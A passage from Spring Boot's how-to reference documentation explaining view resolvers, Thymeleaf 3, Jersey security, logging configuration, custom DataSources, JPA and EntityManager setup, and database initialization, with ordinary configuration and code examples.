Spring Boot, on the\nother hand, installs one or two for you depending on what it finds on the classpath and\nin the application context. The `DispatcherServlet` uses all the resolvers it finds in\nthe application context, trying each one in turn until it gets a result, so if you are\nadding your own you have to be aware of the order and in which position your resolver is\nadded.\n\n`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:\n\n* An `InternalResourceViewResolver` with bean id '`defaultViewResolver`'. This one locates\n physical resources that can be rendered using the `DefaultServlet` (e.g. static\n resources and JSP pages if you are using those). It applies a prefix and a suffix to the\n view name and then looks for a physical resource with that path in the servlet context\n (defaults are both empty, but accessible for external configuration via\n `spring.mvc.view.prefix` and `spring.mvc.view.suffix`). It can be overridden by providing a\n bean of the same type.\n* A `BeanNameViewResolver` with id '`beanNameViewResolver`'. This is a useful member of the\n view resolver chain and will pick up any beans with the same name as the `View` being\n resolved. It shouldn't be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` with id '`viewResolver`' is only added if there *are*\n actually beans of type `View` present. This is a '`master`' resolver, delegating to all\n the others and attempting to find a match to the '`Accept`' HTTP header sent by the\n client. There is a useful\n https:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about `ContentNegotiatingViewResolver`]\n that you might like to study to learn more, and also look at the source code for detail.\n You can switch off the auto-configured\n `ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf you will also have a `ThymeleafViewResolver` with id\n '`thymeleafViewResolver`'. It looks for resources by surrounding the view name with a\n prefix and suffix (externalized to `spring.thymeleaf.prefix` and\n `spring.thymeleaf.suffix`, defaults '`classpath:\/templates\/`' and '`.html`'\n respectively). It can be overridden by providing a bean of the same name.\n* If you use FreeMarker you will also have a `FreeMarkerViewResolver` with id\n '`freeMarkerViewResolver`'. It looks for resources in a loader path (externalized to\n `spring.freemarker.templateLoaderPath`, default '`classpath:\/templates\/`') by\n surrounding the view name with a prefix and suffix (externalized to `spring.freemarker.prefix`\n and `spring.freemarker.suffix`, with empty and '`.ftl`' defaults respectively). It can\n be overridden by providing a bean of the same name.\n* If you use Groovy templates (actually if groovy-templates is on your classpath) you will\n also have a `GroovyMarkupViewResolver` with id '`groovyMarkupViewResolver`'. It\n looks for resources in a loader path by surrounding the view name with a prefix and\n suffix (externalized to `spring.groovy.template.prefix` and\n `spring.groovy.template.suffix`, defaults '`classpath:\/templates\/`' and '`.tpl`'\n respectively). 
It can be overridden by providing a bean of the same name.

Check out {sc-spring-boot-autoconfigure}/web/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`],
{sc-spring-boot-autoconfigure}/thymeleaf/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`],
{sc-spring-boot-autoconfigure}/freemarker/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`] and
{sc-spring-boot-autoconfigure}/groovy/template/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]
for more details.



[[howto-use-thymeleaf-3]]
=== Use Thymeleaf 3
By default, `spring-boot-starter-thymeleaf` uses Thymeleaf 2.1. If you are using the
`spring-boot-starter-parent`, you can use Thymeleaf 3 by overriding the
`thymeleaf.version` and `thymeleaf-layout-dialect.version` properties, for example:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<properties>
		<thymeleaf.version>3.0.2.RELEASE</thymeleaf.version>
		<thymeleaf-layout-dialect.version>2.1.1</thymeleaf-layout-dialect.version>
	</properties>
----

NOTE: If you are managing dependencies yourself, look at `spring-boot-dependencies` for
the list of artifacts that are related to those two versions.

To avoid a warning message about the HTML 5 template mode being deprecated and the HTML
template mode being used instead, you may also want to explicitly configure
`spring.thymeleaf.mode` to be `HTML`, for example:

[source,properties,indent=0,subs="verbatim,quotes,attributes"]
----
	spring.thymeleaf.mode: HTML
----

Please refer to the
{github-code}/spring-boot-samples/spring-boot-sample-web-thymeleaf3[Thymeleaf 3 sample] to
see this in action.

If you are using any of the other auto-configured Thymeleaf Extras (Spring Security,
Data Attribute, or Java 8 Time) you should also override each of their versions to one
that is compatible with Thymeleaf 3.0.



[[howto-jersey]]
== Jersey



[[howto-jersey-spring-security]]
=== Secure Jersey endpoints with Spring Security
Spring Security can be used to secure a Jersey-based web application in much the same
way as it can be used to secure a Spring MVC-based web application. However, if you want
to use Spring Security's method-level security with Jersey, you must configure Jersey to
use `setStatus(int)` rather than `sendError(int)`. This prevents Jersey from committing
the response before Spring Security has had an opportunity to report an authentication
or authorization failure to the client.

The `jersey.config.server.response.setStatusOverSendError` property must be set to `true`
on the application's `ResourceConfig` bean, as shown in the following example:

[source,java,indent=0]
----
include::{code-examples}/jersey/JerseySetStatusOverSendErrorExample.java[tag=resource-config]
----



[[howto-http-clients]]
== HTTP clients



[[howto-http-clients-proxy-configuration]]
=== Configure RestTemplate to use a proxy
As described in <<spring-boot-features.adoc#boot-features-restclient-customization>>,
a `RestTemplateCustomizer` can be used with `RestTemplateBuilder` to build a customized
`RestTemplate`. This is the recommended approach for creating a `RestTemplate` configured
to use a proxy.

The exact details of the proxy configuration depend on the underlying client request
factory that is being used.
Here's an example of configuring\n`HttpComponentsClientRequestFactory` with an `HttpClient` that uses a proxy for all hosts\nexcept `192.168.0.5`.\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/client\/RestTemplateProxyCustomizationExample.java[tag=customizer]\n----\n\n\n\n[[howto-logging]]\n== Logging\n\nSpring Boot has no mandatory logging dependency, except for the Commons Logging API, of\nwhich there are many implementations to choose from. To use http:\/\/logback.qos.ch[Logback]\nyou need to include it and `jcl-over-slf4j` (which implements the Commons Logging API) on\nthe classpath. The simplest way to do that is through the starters which all depend on\n`spring-boot-starter-logging`. For a web application you only need\n`spring-boot-starter-web` since it depends transitively on the logging starter. For\nexample, using Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on\nthe content of the classpath. If Logback is available it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers\nthen you can do that in `application.properties` using the \"logging.level\" prefix, e.g.\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to log to (in addition to the console) using\n\"logging.file\".\n\nTo configure the more fine-grained settings of a logging system you need to use the native\nconfiguration format supported by the `LoggingSystem` in question. By default Spring Boot\npicks up the native configuration from its default location for the system (e.g.\n`classpath:logback.xml` for Logback), but you can set the location of the config file\nusing the \"logging.config\" property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for logging\nIf you put a `logback.xml` in the root of your classpath it will be picked up from\nthere\n(or `logback-spring.xml` to take advantage of the templating features provided by Boot).\nSpring Boot provides a default base configuration that you can include if you just\nwant to set levels, e.g.\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/base.xml\"\/>\n\t\t<logger name=\"org.springframework.web\" level=\"DEBUG\"\/>\n\t<\/configuration>\n----\n\nIf you look at that `base.xml` in the spring-boot jar, you will see that it uses\nsome useful System properties which the `LoggingSystem` takes care of creating for you.\nThese are:\n\n* `${PID}` the current process ID.\n* `${LOG_FILE}` if `logging.file` was set in Boot's external configuration.\n* `${LOG_PATH}` if `logging.path` was set (representing a directory for\n log files to live in).\n* `${LOG_EXCEPTION_CONVERSION_WORD}` if `logging.exception-conversion-word` was set in\n Boot's external configuration.\n\nSpring Boot also provides some nice ANSI colour terminal output on a console (but not in\na log file) using a custom Logback converter. 
See the default `base.xml` configuration\nfor details.\n\nIf Groovy is on the classpath you should be able to configure Logback with\n`logback.groovy` as well (it will be given preference if present).\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure logback for file only output\nIf you want to disable console logging and write output only to a file you need a custom\n`logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file` to your `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.file=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for logging\nSpring Boot supports http:\/\/logging.apache.org\/log4j\/2.x[Log4j 2] for logging\nconfiguration if it is on the classpath. If you are using the starters for\nassembling dependencies that means you have to exclude Logback and then include log4j 2\ninstead. If you aren't using the starters then you need to provide `jcl-over-slf4j`\n(at least) in addition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some\njiggling with excludes, .e.g. in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The use of the Log4j starters gathers together the dependencies for common logging\nrequirements (e.g. including having Tomcat use `java.util.logging` but configuring the\noutput using Log4j 2). See the Actuator Log4j 2 samples for more detail and to see it in\naction.\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into\nLog4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK\nlogging adapter] by setting the `java.util.logging.manager` system property to\n`org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON\nconfiguration files. 
To configure Log4j 2 to use an alternative configuration file format,\nadd the appropriate dependencies to the classpath and name your\nconfiguration files to match your chosen file format:\n\n[cols=\"10,75,15\"]\n|===\n|Format|Dependencies|File names\n\n|YAML\na| `com.fasterxml.jackson.core:jackson-databind` +\n `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\na| `log4j2.yaml` +\n `log4j2.yml`\n\n|JSON\na| `com.fasterxml.jackson.core:jackson-databind`\na| `log4j2.json` +\n `log4j2.jsn`\n|===\n\n[[howto-data-access]]\n== Data Access\n\n\n\n[[howto-configure-a-datasource]]\n=== Configure a custom DataSource\nTo configure your own `DataSource` define a `@Bean` of that type in your configuration.\nSpring Boot will reuse your `DataSource` anywhere one is required, including database\ninitialization. If you need to externalize some settings, you can easily bind your\n`DataSource` to the environment (see\n<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>).\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your `FancyDataSource` has regular JavaBean properties for the url, the\nusername and the pool size, these settings will be bound automatically before the\n`DataSource` is made available to other components. The regular\n<<howto-initialize-a-database-using-spring-jdbc,database initialization>> will also happen\n(so the relevant sub-set of `spring.datasource.*` can still be used with your custom\nconfiguration).\n\nYou can apply the same principle if you are configuring a custom JNDI `DataSource`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean(destroyMethod=\"\")\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() throws Exception {\n\t\tJndiDataSourceLookup dataSourceLookup = new JndiDataSourceLookup();\n\t\treturn dataSourceLookup.getDataSource(\"java:comp\/env\/jdbc\/YourDS\");\n\t}\n----\n\nSpring Boot also provides a utility builder class `DataSourceBuilder` that can be used to\ncreate one of the standard data sources (if it is on the classpath). The builder can\ndetect the one to use based on what's available on the classpath. It also auto detects the\ndriver based on the JDBC url.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all that is needed really is the connection\ninformation; pool-specific settings can also be provided, check the implementation that\nis going to be used at runtime for more details.\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.pool-size=30\n----\n\nThere is a catch however. Because the actual type of the connection pool is not exposed,\nno keys are generated in the metadata for your custom `DataSource` and no completion is\navailable in your IDE (The `DataSource` interface doesn't expose any property). Also, if\nyou happen to _only_ have Hikari on the classpath, this basic setup will not work because\nHikari has no `url` parameter (but a `jdbcUrl` parameter). 
You will have to rewrite
your configuration as follows:

[source,properties,indent=0]
----
	app.datasource.jdbc-url=jdbc:mysql://localhost/test
	app.datasource.username=dbuser
	app.datasource.password=dbpass
	app.datasource.maximum-pool-size=30
----

You can fix that by declaring the dedicated connection pool implementation as the return
type of your `@Bean` method rather than `DataSource`. You won't be able to change the
implementation at runtime but the list of options will be explicit.

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
include::{code-examples}/jdbc/SimpleDataSourceExample.java[tag=configuration]
----

You can even go further by leveraging what `DataSourceProperties` does for you, that is,
providing a default embedded database (with a sensible username and password) if no url
is provided. You can easily initialize a `DataSourceBuilder` from the state of any
`DataSourceProperties` so you could just as well inject the one Spring Boot creates
automatically. However, that would split your configuration across two namespaces: url,
username, password, type and driver on `spring.datasource` and the rest on your custom
namespace (`app.datasource`). To avoid that, you can redefine a custom
`DataSourceProperties` on your custom namespace:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
include::{code-examples}/jdbc/ConfigurableDataSourceExample.java[tag=configuration]
----

This setup puts you _on par_ with what Spring Boot does for you by default, except that
a dedicated connection pool is chosen (in code) and its settings are exposed in the same
namespace. Because `DataSourceProperties` is taking care of the `url`/`jdbcUrl`
translation for you, you can configure it like this:

[source,properties,indent=0]
----
	app.datasource.url=jdbc:mysql://localhost/test
	app.datasource.username=dbuser
	app.datasource.password=dbpass
	app.datasource.maximum-pool-size=30
----

NOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type`
will have no effect. In practice the builder will be initialized with whatever value you
might set there and then overridden by the call to `.type()`.

See _<<spring-boot-features.adoc#boot-features-configure-datasource>>_ in the
'`Spring Boot features`' section and the
{sc-spring-boot-autoconfigure}/jdbc/DataSourceAutoConfiguration.{sc-ext}[`DataSourceAutoConfiguration`]
class for more details.



[[howto-two-datasources]]
=== Configure Two DataSources
If you need to configure multiple data sources, you can apply the same tricks that are
described in the previous section. You must, however, mark one of the `DataSource` beans
as `@Primary` as various auto-configurations down the road expect to be able to get one
by type.

If you create your own `DataSource`, the auto-configuration will back off. In the example
below, we provide the _exact_ same feature set as the auto-configuration provides on the
primary data source:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
include::{code-examples}/jdbc/SimpleTwoDataSourcesExample.java[tag=configuration]
----

TIP: `fooDataSourceProperties` has to be flagged as `@Primary` so that the database
initializer feature uses your copy (should you use that).

Both data sources are also bound for advanced customizations.
For instance you could\nconfigure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.foo.type=com.zaxxer.hikari.HikariDataSource\n\tapp.datasource.foo.maximum-pool-size=30\n\n\tapp.datasource.bar.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.bar.username=dbuser\n\tapp.datasource.bar.password=dbpass\n\tapp.datasource.bar.max-total=30\n----\n\nOf course, you can apply the same concept to the secondary `DataSource` as well:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThis final example configures two data sources on custom namespaces with the same logic\nthan what Spring Boot would do in auto-configuration.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data repositories\nSpring Data can create implementations for you of `@Repository` interfaces of various\nflavors. Spring Boot will handle all of that for you as long as those `@Repositories`\nare included in the same package (or a sub-package) of your `@EnableAutoConfiguration`\nclass.\n\nFor many applications all you will need is to put the right Spring Data dependencies on\nyour classpath (there is a `spring-boot-starter-data-jpa` for JPA and a\n`spring-boot-starter-data-mongodb` for Mongodb), create some repository interfaces to handle your\n`@Entity` objects. Examples are in the {github-code}\/spring-boot-samples\/spring-boot-sample-data-jpa[JPA sample]\nor the {github-code}\/spring-boot-samples\/spring-boot-sample-data-mongodb[Mongodb sample].\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, use the `@EnableJpaRepositories`\nannotation (from Spring Data JPA).\n\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity definitions from Spring configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, you can use the `@EntityScan`\nannotation, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA properties\nSpring Data JPA already provides some vendor-independent configuration options (e.g.\nfor SQL logging) and Spring Boot exposes those, and a few more for hibernate as external\nconfiguration properties. Some of them are automatically detected according to the context\nso you shouldn't have to set them.\n\nThe `spring.jpa.hibernate.ddl-auto` is a special case in that it has different defaults\ndepending on whether you are using an embedded database (`create-drop`) or not (`none`).\nThe dialect to use is also automatically detected based on the current `DataSource` but\nyou can set `spring.jpa.database` yourself if you want to be explicit and bypass that\ncheck on startup.\n\nNOTE: Specifying a `database` leads to the configuration of a well-defined Hibernate\ndialect. 
Several databases have more than one `Dialect` and this may not suit your need.\nIn that case, you can either set `spring.jpa.database` to `default` to let Hibernate figure\nthings out or set the dialect using the `spring.jpa.database-platform` property.\n\nThe most common options to set are:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy\n\tspring.jpa.show-sql=true\n----\n\nIn addition all properties in `+spring.jpa.properties.*+` are passed through as normal JPA\nproperties (with the prefix stripped) when the local `EntityManagerFactory` is created.\n\n\n\n[[howto-configure-hibernate-naming-strategy]]\n=== Configure Hibernate Naming Strategy\nSpring Boot provides a consistent naming strategy regardless of the Hibernate generation\nthat you are using. If you are using Hibernate 4, you can customize it using\n`spring.jpa.hibernate.naming.strategy`; Hibernate 5 defines a `Physical` and `Implicit`\nnaming strategies.\n\nSpring Boot configures `SpringPhysicalNamingStrategy` by default. This implementation\nprovides the same table structure as Hibernate 4: all dots are replaced by underscores and\ncamel cases are replaced by underscores as well. By default, all table names are generated\nin lower case but it is possible to override that flag if your schema requires it.\n\nConcretely, a `TelephoneNumber` entity will be mapped to the `telephone_number` table.\n\nIf you'd rather use Hibernate 5's default instead, set the following property:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl\n----\n\n\nSee {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[`HibernateJpaAutoConfiguration`]\nand {sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor more details.\n\n\n\n[[howto-use-custom-entity-manager]]\n=== Use a custom EntityManagerFactory\nTo take full control of the configuration of the `EntityManagerFactory`, you need to add\na `@Bean` named '`entityManagerFactory`'. Spring Boot auto-configuration switches off its\nentity manager based on the presence of a bean of that type.\n\n\n\n[[howto-use-two-entity-managers]]\n=== Use Two EntityManagers\nEven if the default `EntityManagerFactory` works fine, you will need to define a new one\nbecause otherwise the presence of the second bean of that type will switch off the\ndefault. To make it easy to do that you can use the convenient `EntityManagerBuilder`\nprovided by Spring Boot, or if you prefer you can just use the\n`LocalContainerEntityManagerFactoryBean` directly from Spring ORM.\n\nExample:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ add two data sources configured as above\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(customerDataSource())\n\t\t\t\t.packages(Customer.class)\n\t\t\t\t.persistenceUnit(\"customers\")\n\t\t\t\t.build();\n\t}\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(orderDataSource())\n\t\t\t\t.packages(Order.class)\n\t\t\t\t.persistenceUnit(\"orders\")\n\t\t\t\t.build();\n\t}\n----\n\nThe configuration above almost works on its own. 
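To complete the picture you need to configure `TransactionManagers` for the two
`EntityManagers` as well. A minimal sketch, assuming the two factory beans defined above
(the parameter names are assumed to disambiguate which `EntityManagerFactory` is injected
into each transaction manager):

[source,java,indent=0]
----
	// the parameter names match the factory bean names defined above,
	// which disambiguates the injection (an assumption of this sketch)
	@Bean
	@Primary
	public PlatformTransactionManager customerTransactionManager(
			EntityManagerFactory customerEntityManagerFactory) {
		return new JpaTransactionManager(customerEntityManagerFactory);
	}

	@Bean
	public PlatformTransactionManager orderTransactionManager(
			EntityManagerFactory orderEntityManagerFactory) {
		return new JpaTransactionManager(orderEntityManagerFactory);
	}
----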
Marking one of them as `@Primary`, as shown above, lets it serve as the application's
default transaction manager; the other has to be injected explicitly wherever it is
needed. Or you might be able to use a JTA transaction manager spanning both.

If you are using Spring Data, you need to configure `@EnableJpaRepositories` accordingly:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Configuration
	@EnableJpaRepositories(basePackageClasses = Customer.class,
			entityManagerFactoryRef = "customerEntityManagerFactory")
	public class CustomerConfiguration {
		...
	}

	@Configuration
	@EnableJpaRepositories(basePackageClasses = Order.class,
			entityManagerFactoryRef = "orderEntityManagerFactory")
	public class OrderConfiguration {
		...
	}
----



[[howto-use-traditional-persistence-xml]]
=== Use a traditional persistence.xml
Spring Boot will not search for or use a `META-INF/persistence.xml` by default. If you
prefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of type
`LocalEntityManagerFactoryBean` (with id '`entityManagerFactory`') and set the persistence
unit name there.

See
{sc-spring-boot-autoconfigure}/orm/jpa/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]
for the default settings.



[[howto-use-spring-data-jpa--and-mongo-repositories]]
=== Use Spring Data JPA and Mongo repositories

Spring Data JPA and Spring Data Mongo can both create `Repository` implementations for you
automatically. If they are both present on the classpath, you might have to do some extra
configuration to tell Spring Boot which one (or both) should create repositories for you.
The most explicit way to do that is to use the standard Spring Data
`+@Enable*Repositories+` and tell it the location of your `Repository` interfaces
(where '`*`' is '`Jpa`' or '`Mongo`' or both).

There are also flags `+spring.data.*.repositories.enabled+` that you can use to switch the
auto-configured repositories on and off in external configuration. This is useful, for
instance, if you want to switch off the Mongo repositories and still use the
auto-configured `MongoTemplate`.

The same obstacle and the same features exist for other auto-configured Spring Data
repository types (Elasticsearch, Solr). Just change the names of the annotations and flags
respectively.



[[howto-use-exposing-spring-data-repositories-rest-endpoint]]
=== Expose Spring Data repositories as a REST endpoint
Spring Data REST can expose the `Repository` implementations as REST endpoints for you as
long as Spring MVC has been enabled for the application.

Spring Boot exposes a set of useful properties from the `spring.data.rest` namespace that
customize the
{spring-data-rest-javadoc}/core/config/RepositoryRestConfiguration.{dc-ext}[`RepositoryRestConfiguration`].
If you need to provide additional customization, you should use a
{spring-data-rest-javadoc}/webmvc/config/RepositoryRestConfigurer.{dc-ext}[`RepositoryRestConfigurer`]
bean.

NOTE: If you don't specify any order on your custom `RepositoryRestConfigurer` it will run
after the one Spring Boot uses internally.
If you need to specify an order, make sure it\nis higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a component that is used by JPA\nIf you want to configure a component that will be used by JPA then you need to ensure\nthat the component is initialized before JPA. Where the component is auto-configured\nSpring Boot will take care of this for you. For example, when Flyway is auto-configured,\nHibernate is configured to depend upon Flyway so that the latter has a chance to\ninitialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an\n`EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up\nthe necessary dependencies. For example, if you are using Hibernate Search with\nElasticsearch as its index manager then any `EntityManagerFactory` beans must be\nconfigured to depend on the `elasticsearchClient` bean:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own\n`DSLContext` for each, refer to\n{sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration]\nfor more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be\nreused to provide similar features to what the auto-configuration does with a single\n`DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database initialization\nAn SQL database can be initialized in different ways depending on what your stack is. Or\nof course you can do it manually as long as the database is a separate process.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a database using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the\ndatabase. This is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor\n independent.\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the\n behavior in a more fine-grained way. See below for more detail.\n\n\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a database using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly and the standard Hibernate property\nvalues are `none`, `validate`, `update`, `create`, `create-drop`. Spring Boot chooses a\ndefault value for you based on whether it thinks your database is embedded (default\n`create-drop`) or not (default `none`). An embedded database is detected by looking at the\n`Connection` type: `hsqldb`, `h2` and `derby` are embedded, the rest are not. Be careful\nwhen switching from in-memory to a '`real`' database that you don't make assumptions about\nthe existence of the tables and data in the new platform. You either have to set `ddl-auto`\nexplicitly, or use one of the other mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger. This\nis done for you automatically if you enable the <<boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath will be executed on\nstartup if Hibernate creates the schema from scratch (that is if the `ddl-auto` property\nis set to `create` or `create-drop`). 
This can be useful for demos and for testing if you
are careful, but probably not something you want to be on the classpath in production. It
is a Hibernate feature (nothing to do with Spring).


[[howto-initialize-a-database-using-spring-jdbc]]
=== Initialize a database
Spring Boot can automatically create the schema (DDL scripts) of your `DataSource` and
initialize it (DML scripts): it loads SQL from the standard root classpath locations
`schema.sql` and `data.sql`, respectively. In addition Spring Boot will process the
`schema-${platform}.sql` and `data-${platform}.sql` files (if present), where `platform`
is the value of `spring.datasource.platform`. This allows you to switch to
database-specific scripts if necessary, e.g. you might choose to set it to the vendor name
of the database (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql` etc.).

Spring Boot enables the fail-fast feature of the Spring JDBC initializer by default, so if
the scripts cause exceptions the application will fail to start. You can tune that using
`spring.datasource.continue-on-error`.

NOTE: In a JPA-based app, you can choose to let Hibernate create the schema or use
`schema.sql`, but not both. Make sure to disable `spring.jpa.hibernate.ddl-auto` if you
choose the latter.

You can also disable initialization by setting `spring.datasource.initialize` to `false`.



[[howto-initialize-a-spring-batch-database]]
=== Initialize a Spring Batch database
If you are using Spring Batch then it comes pre-packaged with SQL initialization scripts
for most popular database platforms. Spring Boot will detect your database type, and
execute those scripts by default, and in this case will switch the fail-fast setting to
false (errors are logged but do not prevent the application from starting). This is
because the scripts are known to be reliable and generally do not contain bugs, so errors
are ignorable, and ignoring them makes the scripts idempotent. You can switch off the
initialization explicitly using `spring.batch.initializer.enabled=false`.



[[howto-use-a-higher-level-database-migration-tool]]
=== Use a higher-level database migration tool
Spring Boot supports two higher-level migration tools: http://flywaydb.org/[Flyway]
and http://www.liquibase.org/[Liquibase].

[[howto-execute-flyway-database-migrations-on-startup]]
==== Execute Flyway database migrations on startup
To automatically run Flyway database migrations on startup, add
`org.flywaydb:flyway-core` to your classpath.

